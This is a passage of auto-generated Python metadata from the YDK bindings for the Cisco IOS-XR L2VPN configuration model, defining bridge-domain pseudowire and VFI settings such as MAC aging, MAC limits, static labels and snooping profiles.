'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' Logging Type
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-ip-source-guard',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacSecure' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacSecure',
False,
[
_MetaInfoClassMember('action', REFERENCE_ENUM_CLASS, 'MacSecureActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacSecureActionEnum',
[], [],
''' MAC secure enforcement action
''',
'action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable L2 Pseudowire MAC Secure
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MAC Secure
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' MAC Secure Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-mac-secure',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacAging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacAging',
False,
[
_MetaInfoClassMember('pseudowire-mac-aging-time', ATTRIBUTE, 'int' , None, None,
[('300', '30000')], [],
''' MAC Aging Time
''',
'pseudowire_mac_aging_time',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-aging-type', REFERENCE_ENUM_CLASS, 'MacAgingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacAgingEnum',
[], [],
''' MAC address aging type
''',
'pseudowire_mac_aging_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-mac-aging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacLimit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacLimit',
False,
[
_MetaInfoClassMember('pseudowire-mac-limit-action', REFERENCE_ENUM_CLASS, 'MacLimitActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLimitActionEnum',
[], [],
''' Bridge Access Pseudowire MAC address
limit enforcement action
''',
'pseudowire_mac_limit_action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-limit-max', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Number of MAC addresses on a Bridge
Access Pseudowire after which MAC limit
action is taken
''',
'pseudowire_mac_limit_max',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-limit-notif', REFERENCE_ENUM_CLASS, 'MacNotificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacNotificationEnum',
[], [],
''' MAC address limit notification action
in a Bridge Access Pseudowire
''',
'pseudowire_mac_limit_notif',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-mac-limit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Bridge-domain Pseudowire MAC
configuration mode
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-aging', REFERENCE_CLASS, 'PseudowireMacAging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacAging',
[], [],
''' MAC-Aging configuration commands
''',
'pseudowire_mac_aging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-learning', REFERENCE_ENUM_CLASS, 'MacLearnEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLearnEnum',
[], [],
''' Enable MAC Learning
''',
'pseudowire_mac_learning',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-limit', REFERENCE_CLASS, 'PseudowireMacLimit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacLimit',
[], [],
''' MAC-Limit configuration commands
''',
'pseudowire_mac_limit',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-port-down-flush', REFERENCE_ENUM_CLASS, 'PortDownFlushEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'PortDownFlushEnum',
[], [],
''' Enable/Disable MAC Flush When Port goes
down
''',
'pseudowire_mac_port_down_flush',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-secure', REFERENCE_CLASS, 'PseudowireMacSecure' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacSecure',
[], [],
''' MAC Secure
''',
'pseudowire_mac_secure',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-mac',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon.BdPwSplitHorizonGroup' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon.BdPwSplitHorizonGroup',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable split horizon group
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pw-split-horizon-group',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon',
False,
[
_MetaInfoClassMember('bd-pw-split-horizon-group', REFERENCE_CLASS, 'BdPwSplitHorizonGroup' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon.BdPwSplitHorizonGroup',
[], [],
''' Split Horizon Group
''',
'bd_pw_split_horizon_group',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pw-split-horizon',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwMplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwMplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pw-mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires.BridgeDomainBackupPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires.BridgeDomainBackupPseudowire',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Neighbor IP address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bridge-domain-backup-pw-class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' PW class template name to use for this
pseudowire
''',
'bridge_domain_backup_pw_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-backup-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires',
False,
[
_MetaInfoClassMember('bridge-domain-backup-pseudowire', REFERENCE_LIST, 'BridgeDomainBackupPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires.BridgeDomainBackupPseudowire',
[], [],
''' Backup pseudowire configuration
''',
'bridge_domain_backup_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-backup-pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Neighbor IP address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bd-pw-class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' PW class template name to use for this
pseudowire
''',
'bd_pw_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-pw-mpls-static-labels', REFERENCE_CLASS, 'BdPwMplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwMplsStaticLabels',
[], [],
''' MPLS static labels
''',
'bd_pw_mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-pw-split-horizon', REFERENCE_CLASS, 'BdPwSplitHorizon' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon',
[], [],
''' Split Horizon
''',
'bd_pw_split_horizon',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-pw-static-mac-addresses', REFERENCE_CLASS, 'BdPwStaticMacAddresses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses',
[], [],
''' Static Mac Address Table
''',
'bd_pw_static_mac_addresses',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bdpw-storm-control-types', REFERENCE_CLASS, 'BdpwStormControlTypes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes',
[], [],
''' Storm Control
''',
'bdpw_storm_control_types',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bridge-domain-backup-pseudowires', REFERENCE_CLASS, 'BridgeDomainBackupPseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires',
[], [],
''' List of pseudowires
''',
'bridge_domain_backup_pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-dai', REFERENCE_CLASS, 'PseudowireDai' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai',
[], [],
''' Access Pseudowire Dynamic ARP Inspection
''',
'pseudowire_dai',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-flooding', REFERENCE_ENUM_CLASS, 'InterfaceTrafficFloodEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceTrafficFloodEnum',
[], [],
''' Bridge-domain Pseudowire flooding
''',
'pseudowire_flooding',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-flooding-unknown-unicast', REFERENCE_ENUM_CLASS, 'InterfaceTrafficFloodEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceTrafficFloodEnum',
[], [],
''' Bridge-domain Pseudowire flooding Unknown
Unicast
''',
'pseudowire_flooding_unknown_unicast',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-igmp-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a IGMP Snooping profile
''',
'pseudowire_igmp_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-ip-source-guard', REFERENCE_CLASS, 'PseudowireIpSourceGuard' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireIpSourceGuard',
[], [],
''' IP Source Guard
''',
'pseudowire_ip_source_guard',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac', REFERENCE_CLASS, 'PseudowireMac' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac',
[], [],
''' Bridge-domain Pseudowire MAC
configuration commands
''',
'pseudowire_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mld-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a MLD Snooping profile
''',
'pseudowire_mld_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-profile', REFERENCE_CLASS, 'PseudowireProfile' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireProfile',
[], [],
''' Attach a DHCP profile
''',
'pseudowire_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires',
False,
[
_MetaInfoClassMember('bd-pseudowire', REFERENCE_LIST, 'BdPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire',
[], [],
''' Pseudowire configuration
''',
'bd_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports.Transport' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports.Transport',
False,
[
_MetaInfoClassMember('transport-name', ATTRIBUTE, 'str' , None, None,
[], ['(RSVP_TE)'],
''' Transport Type
''',
'transport_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('attribute-set-name', ATTRIBUTE, 'str' , None, None,
[(0, 64)], [],
''' Multicast P2MP TE Attribute Set Name
''',
'attribute_set_name',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'transport',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports',
False,
[
_MetaInfoClassMember('transport', REFERENCE_LIST, 'Transport' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports.Transport',
[], [],
''' Multicast P2MP Transport Type
''',
'transport',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'transports',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings.Signaling' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings.Signaling',
False,
[
_MetaInfoClassMember('signaling-name', ATTRIBUTE, 'str' , None, None,
[], ['(BGP)'],
''' Signaling Type
''',
'signaling_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'signaling',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings',
False,
[
_MetaInfoClassMember('signaling', REFERENCE_LIST, 'Signaling' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings.Signaling',
[], [],
''' Multicast P2MP Signaling Type
''',
'signaling',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'signalings',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Autodiscovery P2MP
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('signalings', REFERENCE_CLASS, 'Signalings' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings',
[], [],
''' Multicast P2MP Signaling Type
''',
'signalings',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('transports', REFERENCE_CLASS, 'Transports' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports',
[], [],
''' Multicast P2MP Transport
''',
'transports',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'multicast-p2mp',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwDhcpSnoop' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwDhcpSnoop',
False,
[
_MetaInfoClassMember('dhcp-snooping-id', ATTRIBUTE, 'str' , None, None,
[], [],
''' Disable DHCP snooping
''',
'dhcp_snooping_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile-id', REFERENCE_ENUM_CLASS, 'InterfaceProfileEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceProfileEnum',
[], [],
''' Set the snooping profile
''',
'profile_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfi-pw-dhcp-snoop',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwMplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwMplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfi-pw-mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses.PseudowireStaticMacAddress' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses.PseudowireStaticMacAddress',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-static-mac-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
